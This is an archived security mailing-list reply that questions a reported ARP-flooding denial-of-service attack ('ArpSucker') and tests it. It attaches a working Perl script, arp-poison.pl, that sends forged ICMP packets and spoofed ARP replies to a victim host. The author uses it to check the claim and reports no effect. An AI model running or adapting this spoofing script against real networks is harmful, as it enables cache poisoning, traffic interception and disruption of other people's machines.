lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
From: greg at y2004.nest.cx (Gregory Steuck)
Subject: Re: The ArpSucker is b0rn! Be yourself, be the net.

>>>>> "alpt" == alpt  <alpt@...aknet.org> writes:

    alpt> Then when I tried to become all the 2^32-1 IPs, I realized
    alpt> that the attacked machine (elibus and pallotron, eheheh), were
    alpt> under a mortal DoS. The Elibus' machine was constantly at 100%
    alpt> of cpu until Elibus unplugged the eth0 cable, while the
    alpt> Pallotron's machine went in kernel panic!. Elibus uses an x86
    alpt> arch with the linux kernel, pallotron uses An Apple I-book,
    alpt> with MacOsx.

I am not sure if this report is accurate. I played a little with the
attached perl script which should be doing the same thing that ArpSucker
alleges to do. I ran the script against OpenBSD 3.6 and Linux
2.4.22-gentoo-r5. Both of them only accept the directly attached net
addresses (/24 in my case) into the arp cache. Anything beyond that has
no observable effect except echo reply sent along the default route.

Running: arp-poison.pl <victim> <spoof_start> <count> <intf>

Granted the performance of the script is way lower than a single process
would have, but I doubt that running it any faster makes arp cache
accept non-directly-connect entries.

Has anybody validated the original claim?

Thanks
Greg

#!/usr/bin/perl
use strict;

sub ip_to_int($) {
    my ($a, $b, $c, $d) = split(/\./, $_[0]);
    return ($a << 24) + ($b << 16) + ($c << 8) + $d;
}

sub int_to_ip($) {
    my ($ip) = @_;
    return ($ip >> 24) . "." . (($ip >> 16) & 255) . "." . (($ip >>  8) & 255) . "." . ($ip & 255);
}

sub system_or_die(@) {
    system (@_);
    die join(' ', @_) . " failed with exit code " . ($? >> 8) . "\n"
      unless $? == 0;
}

my $spoof_eth = '00:11:2f:77:77:77';

my ($victim_ip, $start_ip, $count, $intf) = @ARGV[0..3];

system_or_die ('ping', '-c', '1', $victim_ip);

my $victim_eth = (split (/\s+/, `dnet arp show | grep $victim_ip`))[2];
die "Cannot determine $victim_ip's ethernet address received $victim_eth\n"
  unless split(/:/, $victim_eth) == 6;

my $start_int = ip_to_int($start_ip);
for (my $i = 0; $i < $count; $i++) {
    my $spoof_ip = int_to_ip($start_int + $i);
    system_or_die(
     qq[echo 'aaaaaaaaaaaa' |
        dnet icmp type 8 code 0 |
        dnet ip proto icmp src $spoof_ip dst $victim_ip |
        dnet eth type ip src $spoof_eth dst $victim_eth |
        sudo dnet send $intf ]);
    system_or_die(
     qq[dnet arp op rep sha $spoof_eth spa $spoof_ip tha $victim_eth tpa $victim_ip |
        dnet eth type arp src $spoof_eth dst $victim_eth |
        sudo dnet send $intf ]);
}


Powered by blists - more mailing lists